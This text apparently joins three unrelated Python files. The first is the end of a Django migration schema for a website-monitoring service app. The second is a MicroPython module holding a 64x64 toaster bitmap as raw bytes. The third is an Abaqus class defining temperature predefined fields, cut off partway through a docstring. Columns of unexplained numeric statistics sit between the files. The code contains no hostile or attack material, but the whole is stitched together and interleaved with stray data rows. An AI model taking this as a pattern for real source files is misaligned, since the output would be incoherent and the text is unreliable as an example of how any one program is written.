'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_main': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Queue']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
u'services.monitoredphrase': {
'Meta': {'object_name': 'MonitoredPhrase'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'phrase': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Service']"}),
'shall_not_be': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'services.queue': {
'Meta': {'object_name': 'Queue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
u'services.service': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Service'},
'additional_agents': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['services.Agent']", 'null': 'True', 'blank': 'True'}),
'auth_method': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1', 'db_index': 'True'}),
'auth_pass': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'auth_user': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'base_referer': ('django.db.models.fields.URLField', [], {'default': "u''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'base_useragent': ('django.db.models.fields.CharField', [], {'default': "u'Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3'", 'max_length': '250'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'connection_timeout': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '30'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hosting': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_core_service': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'is_technical_break': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '100'}),
'performance_issues_min_probes_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '8'}),
'performance_issues_time': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '15'}),
'response_code': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '200'}),
'sensitivity': ('django.db.models.fields.DecimalField', [], {'default': "'0.5'", 'max_digits': '3', 'decimal_places': '2'}),
'service_not_working_min_probes_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '8'}),
'time_delta': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'services.servicehistory': {
'Meta': {'ordering': "[u'-created']", 'object_name': 'ServiceHistory'},
'agent_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'connect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_probe': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'namelookup_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'num_connects': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pretransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'redirect_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'redirect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'request_params_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'response_code': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'response_state': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1', 'db_index': 'True'}),
'response_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'service_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'size_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'speed_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'starttransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'tick_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'services.servicehistoryarchive': {
'Meta': {'ordering': "[u'-created']", 'object_name': 'ServiceHistoryArchive'},
'agent_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'connect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'namelookup_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'num_connects': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pretransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'redirect_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'redirect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'response_time': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'service_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'size_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'speed_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'starttransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'})
},
u'services.servicehistoryextra': {
'Meta': {'object_name': 'ServiceHistoryExtra'},
'effective_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'error_msg': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service_history_id': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'wordchecks_errors': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['services']
| 86.416382
| 776
| 0.639771
| 2,942
| 25,320
| 5.364378
| 0.067641
| 0.083133
| 0.144595
| 0.206564
| 0.871182
| 0.837093
| 0.817957
| 0.790331
| 0.750539
| 0.700101
| 0
| 0.01372
| 0.165205
| 25,320
| 293
| 777
| 86.416382
| 0.732933
| 0.025474
| 0
| 0.319838
| 0
| 0.036437
| 0.557962
| 0.299911
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008097
| false
| 0.008097
| 0.016194
| 0
| 0.036437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0aa244e7e229383bb01abf66cf3459886a9b588
| 6,786
|
py
|
Python
|
examples/ttgo_tdisplay_rp2040/toasters/t5.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | 153
|
2020-02-02T11:03:14.000Z
|
2022-03-30T05:47:07.000Z
|
examples/TWATCH-2020/toasters/t5.py
|
skylin008/st7789_mpy
|
f304991fc5558be653df5f0de928494b85cbc60d
|
[
"MIT"
] | 58
|
2020-04-11T23:23:02.000Z
|
2022-03-26T20:45:23.000Z
|
examples/TWATCH-2020/toasters/t5.py
|
skylin008/st7789_mpy
|
f304991fc5558be653df5f0de928494b85cbc60d
|
[
"MIT"
] | 50
|
2020-02-02T11:05:23.000Z
|
2022-03-22T15:24:42.000Z
|
HEIGHT = 64
WIDTH = 64
COLORS = 8
BITS = 12288
BPP = 3
PALETTE = [0x0000,0x4049,0x609b,0x4082,0xe0ff,0xffff,0x2000,0x2000]
_bitmap =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x49\x24\x92\x40\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x02\x49\x24\x92\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24\x89\x24'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x24\x94\x92\x49\x24\x89\x24\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x02\x49\x49\x24\x92\x49\x24\x9b\x48'\
b'\x92\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02'\
b'\x49\x49\x24\x92\x49\x24\x9b\x48\x92\x40\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24\x9b\x49\x24\x92\x49'\
b'\x24\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x94'\
b'\x92\x49\x24\x9b\x49\x24\x92\x49\x24\x89\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x02\x49\x49\x24\x92\x6d\x24\x92\x49\x24\x92\x6d'\
b'\x24\x92\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x49\x49\x24'\
b'\x92\x6d\x24\x92\x49\x24\x92\x6d\x24\x92\x24\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x24\x94\x92\x49\x24\x9b\x49\x24\x92\x49\x26\xd2\x49'\
b'\x24\x92\x48\x92\x40\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24'\
b'\x9b\x49\x24\x92\x49\x26\xd2\x49\x24\x92\x48\x92\x40\x00\x00\x00'\
b'\x00\x02\x49\x49\x24\x92\x49\x26\xdb\x49\x24\x9b\x4a\x44\x9b\x91'\
b'\x24\x92\x49\x24\x89\x00\x00\x00\x00\x02\x49\x49\x24\x92\x49\x26'\
b'\xdb\x49\x24\x9b\x4a\x44\x9b\x91\x24\x92\x49\x24\x89\x00\x00\x00'\
b'\x00\x94\x92\x49\x24\x92\x49\x29\x12\x91\x29\x1b\x49\x24\x92\x6d'\
b'\x24\x92\x49\x24\x92\x24\x00\x00\x00\x94\x92\x49\x24\x92\x49\x29'\
b'\x12\x91\x29\x1b\x49\x24\x92\x6d\x24\x92\x49\x24\x92\x24\x00\x00'\
b'\x6c\x94\x9b\x49\x26\xd2\x49\x24\x92\x49\xb4\xa4\x49\xb4\x92\x49'\
b'\xb4\x92\x49\x24\x92\x48\x90\x00\x6c\x94\x9b\x49\x26\xd2\x49\x24'\
b'\x92\x49\xb4\xa4\x49\xb4\x92\x49\xb4\x92\x49\x24\x92\x48\x90\x00'\
b'\x6d\xb2\x52\x49\x24\x92\x49\xb4\x92\x49\x24\x9b\x49\xb4\x92\x49'\
b'\xb4\x92\x49\x24\x92\x49\x22\x40\x6d\xb2\x52\x49\x24\x92\x49\xb4'\
b'\x92\x49\x24\x9b\x49\xb4\x92\x49\xb4\x92\x49\x24\x92\x49\x22\x40'\
b'\x6d\xb6\xc9\x25\x24\x92\x6d\x26\xd2\x49\x24\x9b\x6d\x24\x92\x49'\
b'\xb6\xd2\x49\x24\x92\x49\x22\x49\x6d\xb6\xc9\x25\x24\x92\x6d\x26'\
b'\xd2\x49\x24\x9b\x6d\x24\x92\x49\xb6\xd2\x49\x24\x92\x49\x22\x49'\
b'\x6d\xb6\xdb\x6c\x96\xd2\x49\x24\x92\x49\x29\x12\x6d\xb4\xa4\x49'\
b'\x24\x92\x49\xb4\x92\x24\x96\xdb\x6d\xb6\xdb\x6c\x96\xd2\x49\x24'\
b'\x92\x49\x29\x12\x6d\xb4\xa4\x49\x24\x92\x49\xb4\x92\x24\x96\xdb'\
b'\x01\xb6\xdb\x6d\xb6\xc9\x25\x24\x92\x49\x24\x92\x49\xb4\x92\x49'\
b'\x24\x92\x49\x24\x89\x6d\xb6\xdb\x01\xb6\xdb\x6d\xb6\xc9\x25\x24'\
b'\x92\x49\x24\x92\x49\xb4\x92\x49\x24\x92\x49\x24\x89\x6d\xb6\xdb'\
b'\x00\x06\xdb\x6d\xb6\xdb\x6c\x92\x52\x49\x24\x92\x49\x24\x92\x49'\
b'\x24\x92\x24\x92\x5b\x6d\xb6\xdb\x00\x06\xdb\x6d\xb6\xdb\x6c\x92'\
b'\x52\x49\x24\x92\x49\x24\x92\x49\x24\x92\x24\x92\x5b\x6d\xb6\xdb'\
b'\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6\xc9\x25\x26\xd2\x49\x24\x92\x49'\
b'\xb2\x49\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6'\
b'\xc9\x25\x26\xd2\x49\x24\x92\x49\xb2\x49\x6d\xb6\xdb\x6d\xb6\xdb'\
b'\x00\x00\x00\x01\xb6\xdb\x6d\xb6\xdb\x6c\x94\x92\x49\x24\x89\x24'\
b'\x96\xdb\x6d\xb6\xdb\x6d\xb0\x00\x00\x00\x00\x01\xb6\xdb\x6d\xb6'\
b'\xdb\x6c\x94\x92\x49\x24\x89\x24\x96\xdb\x6d\xb6\xdb\x6d\xb0\x00'\
b'\x00\x00\x00\x00\x00\x1b\x6d\xb6\xdb\x6d\xb2\x49\x24\x92\x5b\x6d'\
b'\xb6\xdb\x6d\xb6\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x6d\xb6'\
b'\xdb\x6d\xb2\x49\x24\x92\x5b\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x01\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb6\xdb\x6d\xb6\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xb6'\
b'\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xc0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb6\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x1b\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb0\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdb\x6d\xb6\xc0\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x06\xdb\x6d\xb6\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BITMAP = memoryview(_bitmap)
| 64.628571
| 68
| 0.710875
| 1,655
| 6,786
| 2.913595
| 0.033837
| 0.939444
| 1.267316
| 1.513065
| 0.971796
| 0.970344
| 0.968063
| 0.967234
| 0.659063
| 0.59664
| 0
| 0.417429
| 0.017536
| 6,786
| 104
| 69
| 65.25
| 0.305835
| 0
| 0
| 0.336538
| 0
| 0.923077
| 0.905393
| 0.905393
| 0
| 1
| 0.007073
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
46146e7c66251a26b74ae41505d32e18be93b9c7
| 19,946
|
py
|
Python
|
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .PredefinedField import PredefinedField
from ..Region.Region import Region
class Temperature(PredefinedField):
"""The Temperature object stores the data for temperature predefined fields.
The Temperature object is derived from the PredefinedField object.
Attributes
----------
name: str
A String specifying the repository key.
distributionType: SymbolicConstant
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
field: str
A String specifying the name of the AnalyticalField or :py:class:`~abaqus.Field.DiscreteField.DiscreteField` object associated
with this predefined field. The **field** argument applies only when
**distributionType=FIELD** or **distributionType=DISCRETE_FIELD**. The default value is an
empty string.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the predefined field is applied. **:py:class:`~abaqus.Region.Region.Region`**
is ignored if the predefined field has an **instances** member available. **:py:class:`~abaqus.Region.Region.Region`** is also
ignored if the predefined field has a **distributionType** member available, and
**distributionType=FROM_FILE** or FROM_FILE_AND_USER_DEFINED.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].predefinedFields[name]
The corresponding analysis keywords are:
- INITIAL CONDITIONS
- TEMPERATURE
"""
# A String specifying the repository key.
name: str = ''
# A SymbolicConstant specifying how the predefined field varies spatially. Possible values
# are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
# DISCRETE_FIELD. The default value is UNIFORM.
distributionType: SymbolicConstant = UNIFORM
# A String specifying the name of the AnalyticalField or DiscreteField object associated
# with this predefined field. The *field* argument applies only when
# *distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
# empty string.
field: str = ''
# A Region object specifying the region to which the predefined field is applied. *Region*
# is ignored if the predefined field has an *instances* member available. *Region* is also
# ignored if the predefined field has a *distributionType* member available, and
# *distributionType*=FROM_FILE or FROM_FILE_AND_USER_DEFINED.
region: Region = Region()
def __init__(self, name: str, createStepName: str, region: Region,
distributionType: SymbolicConstant = UNIFORM,
crossSectionDistribution: SymbolicConstant = CONSTANT_THROUGH_THICKNESS,
field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method creates a Temperature object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].Temperature
Parameters
----------
name
A String specifying the repository key.
createStepName
A String specifying the name of the step in which the predefined field is created.
region
A Region object specifying the region to which the predefined field is applied. *Region*
is ignored if the predefined field has a *distributionType* member available, and
*distributionType*=FROM_FILE .
distributionType
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
crossSectionDistribution
A SymbolicConstant specifying how the predefined field is distributed over the cross
section of the region. Possible values are
- CONSTANT_THROUGH_THICKNESS
- GRADIENTS_THROUGH_SHELL_CS
- GRADIENTS_THROUGH_BEAM_CS
- POINTS_THROUGH_SECTION
The default value is CONSTANT_THROUGH_THICKNESS.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET.Note:*amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
Returns
-------
A Temperature object.
"""
super().__init__()
pass
def move(self, fromStepName: str, toStepName: str):
"""This method moves the TemperatureState object from one step to a different step.
Parameters
----------
fromStepName
A String specifying the name of the step from which the PredefinedFieldState is moved.
toStepName
A String specifying the name of the step to which the PredefinedFieldState is moved.
Raises
------
TextError.
"""
pass
def setValues(self, distributionType: SymbolicConstant = UNIFORM,
crossSectionDistribution: SymbolicConstant = CONSTANT_THROUGH_THICKNESS,
field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method modifies the data for an existing Temperature object in the step where it is
created.
Parameters
----------
distributionType
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
crossSectionDistribution
A SymbolicConstant specifying how the predefined field is distributed over the cross
section of the region. Possible values are
- CONSTANT_THROUGH_THICKNESS
- GRADIENTS_THROUGH_SHELL_CS
- GRADIENTS_THROUGH_BEAM_CS
- POINTS_THROUGH_SECTION
The default value is CONSTANT_THROUGH_THICKNESS.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET.Note:*amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
